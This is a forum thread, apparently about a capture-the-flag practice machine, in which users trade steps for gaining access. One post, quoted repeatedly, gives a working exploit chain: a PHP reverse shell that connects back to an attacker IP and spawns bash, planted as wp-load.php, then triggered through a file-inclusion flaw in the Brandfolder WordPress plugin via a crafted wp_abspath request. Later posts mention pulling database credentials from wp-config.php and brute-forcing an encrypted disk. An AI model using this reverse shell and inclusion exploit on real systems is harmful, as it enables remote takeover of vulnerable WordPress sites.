Posts: 28 Threads: 0 Joined: N/A August 7, 2022 at 1:34 PM Can someone explain the way he can find the vulnerable plugin? I used nmap and there is a lot of plugins. Did you check everyone for vulns? Or there is other way? What was your train of thought when you got access into local web server? Posts: 24 Threads: 0 Joined: N/A August 7, 2022 at 2:21 PM for user part.
1.go to www-data home dir = /var/www/html/logs/uploads/ this folder is writable for www-data
2.then create new folder. e.g "mkdir wp"
3.now go to /var/www/html/logs/uploads/wp and create reverse shell (!!!name it!!! wp-load.php):
<?php
$sock=fsockopen("IP",PORT);$proc=proc_open("bash", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);
?>
4.also create directory wp-admin/includes
5. now go to /var/www/html/logs/uploads/wp/wp-admin/includes and create files media.php, file.php, image.php, post.php with following content: <?php echo '123'; ?>
6. navigate to ur browser/proxy and request "GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=/var/www/html/logs/uploads/wp/"
if u wana know whats going on read "/opt/site.new/wp-content/plugins/brandfolder/callback.php" and https://www.exploit-db.com/exploits/39591 Posts: 24 Threads: 0 Joined: N/A August 7, 2022 at 2:22 PM (August 7, 2022, 01:34 PM)m4rsh3ll Wrote: Can someone explain the way he can find the vulnerable plugin? I used nmap and there is a lot of plugins. Did you check everyone for vulns? Or there is other way? What was your train of thought when you got access into local web server? do
'cat /usr/local/sbin/startup.sh'
go to the path u see on there
Posts: 213 Threads: 0 Joined: N/A August 7, 2022 at 2:35 PM (August 7, 2022, 02:21 PM)fukingfuck Wrote: for user part.
1.go to www-data home dir = /var/www/html/logs/uploads/ this folder is writable for www-data
2.then create new folder. e.g "mkdir wp"
3.now go to /var/www/html/logs/uploads/wp and create reverse shell (!!!name it!!! wp-load.php):
<?php
$sock=fsockopen("IP",PORT);$proc=proc_open("bash", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);
?>
4.also create directory wp-admin/includes
5. now go to /var/www/html/logs/uploads/wp/wp-admin/includes and create files media.php, file.php, image.php, post.php with following content: <?php echo '123'; ?>
6. navigate to ur browser/proxy and request "GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=/var/www/html/logs/uploads/wp/"
if u wana know whats going on read "/opt/site.new/wp-content/plugins/brandfolder/callback.php" and https://www.exploit-db.com/exploits/39591 Thanks @ farkow and @fukingfuck, finally got the user flag. For some reason, creating the directory under /tmp doesn't work. /var/www/html/logs/uploads/wp works fine though. Posts: 24 Threads: 0 Joined: N/A August 7, 2022 at 2:39 PM (August 7, 2022, 02:21 PM)fukingfuck Wrote: for user part.
1.go to www-data home dir = /var/www/html/logs/uploads/ this folder is writable for www-data
2.then create new folder. e.g "mkdir wp"
3.now go to /var/www/html/logs/uploads/wp and create reverse shell (!!!name it!!! wp-load.php):
<?php
$sock=fsockopen("IP",PORT);$proc=proc_open("bash", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);
?>
4.also create directory wp-admin/includes
5. now go to /var/www/html/logs/uploads/wp/wp-admin/includes and create files media.php, file.php, image.php, post.php with following content: <?php echo '123'; ?>
6. navigate to ur browser/proxy and request "GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=/var/www/html/logs/uploads/wp/"
if u wana know whats going on read "/opt/site.new/wp-content/plugins/brandfolder/callback.php" and https://www.exploit-db.com/exploits/39591 TY this path worked for me vs using the '/tmp' path :heart: Posts: 17 Threads: 0 Joined: N/A August 7, 2022 at 2:40 PM any hint on root part ? Posts: 28 Threads: 0 Joined: N/A August 7, 2022 at 2:41 PM (August 7, 2022, 02:22 PM)vexxxi Wrote: (August 7, 2022, 01:34 PM)m4rsh3ll Wrote: Can someone explain the way he can find the vulnerable plugin? I used nmap and there is a lot of plugins. Did you check everyone for vulns? Or there is other way? What was your train of thought when you got access into local web server?
do
'cat /usr/local/sbin/startup.sh'
go to the path u see on there
hmm... nmap showed me 40+ plugins with the script scan, that why I asked for it.. thnx it's much easier than it seemed :) just check the sources Posts: 24 Threads: 0 Joined: N/A August 7, 2022 at 2:50 PM found:
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
+ creds in wp-config.php Posts: 70 Threads: 0 Joined: N/A August 7, 2022 at 3:02 PM (August 7, 2022, 02:35 PM)Exa Wrote: (August 7, 2022, 02:21 PM)fukingfuck Wrote: for user part.
1.go to www-data home dir = /var/www/html/logs/uploads/ this folder is writable for www-data
2.then create new folder. e.g "mkdir wp"
3.now go to /var/www/html/logs/uploads/wp and create reverse shell (!!!name it!!! wp-load.php):
<?php
$sock=fsockopen("IP",PORT);$proc=proc_open("bash", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);
?>
4.also create directory wp-admin/includes
5. now go to /var/www/html/logs/uploads/wp/wp-admin/includes and create files media.php, file.php, image.php, post.php with following content: <?php echo '123'; ?>
6. navigate to ur browser/proxy and request "GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=/var/www/html/logs/uploads/wp/"
if u wana know whats going on read "/opt/site.new/wp-content/plugins/brandfolder/callback.php" and https://www.exploit-db.com/exploits/39591
Thanks @farkow and @fukingfuck, finally got the user flag.
For some reason, creating the directory under /tmp doesn't work. /var/www/html/logs/uploads/wp works fine though. Anytime! I used /dev/shm. Stuck on root part at the moment actually. Trying to figure out how to open an encrypted vdi file. Somehow, the box and the key itself is not applied in vm and it is not mounted. // on the other processor, brute forcing :P ---------- Update: a nudge for the root. Actually, I have never guessed that the method would be brute forcing but yeah, brute force the encrypted disk when you are at that step :D Posts: 17 Threads: 0 Joined: N/A August 7, 2022 at 3:19 PM (August 7, 2022, 03:02 PM)farkow Wrote: (August 7, 2022, 02:35 PM)Exa Wrote: (August 7, 2022, 02:21 PM)fukingfuck Wrote: for user part.
1.go to www-data home dir = /var/www/html/logs/uploads/ this folder is writable for www-data
2.then create new folder. e.g "mkdir wp"
3.now go to /var/www/html/logs/uploads/wp and create reverse shell (!!!name it!!! wp-load.php):
<?php
$sock=fsockopen("IP",PORT);$proc=proc_open("bash", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);
?>
4.also create directory wp-admin/includes
5. now go to /var/www/html/logs/uploads/wp/wp-admin/includes and create files media.php, file.php, image.php, post.php with following content: <?php echo '123'; ?>
6. navigate to ur browser/proxy and request "GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=/var/www/html/logs/uploads/wp/"
if u wana know whats going on read "/opt/site.new/wp-content/plugins/brandfolder/callback.php" and https://www.exploit-db.com/exploits/39591
Thanks @farkow and @fukingfuck, finally got the user flag.
For some reason, creating the directory under /tmp doesn't work. /var/www/html/logs/uploads/wp works fine though.
Anytime! I used /dev/shm.
Stuck on root part at the moment actually. Trying to figure out how to open an encrypted vdi file. Somehow, the box and the key itself is not applied in vm and it is not mounted.
// on the other processor, brute forcing :P
----------
Update: a nudge for the root. Actually, I have never guessed that the method would be brute forcing but yeah, brute force the encrypted disk when you are at that step :D i don't understand wath is bruteforce the encrypted disk ? |
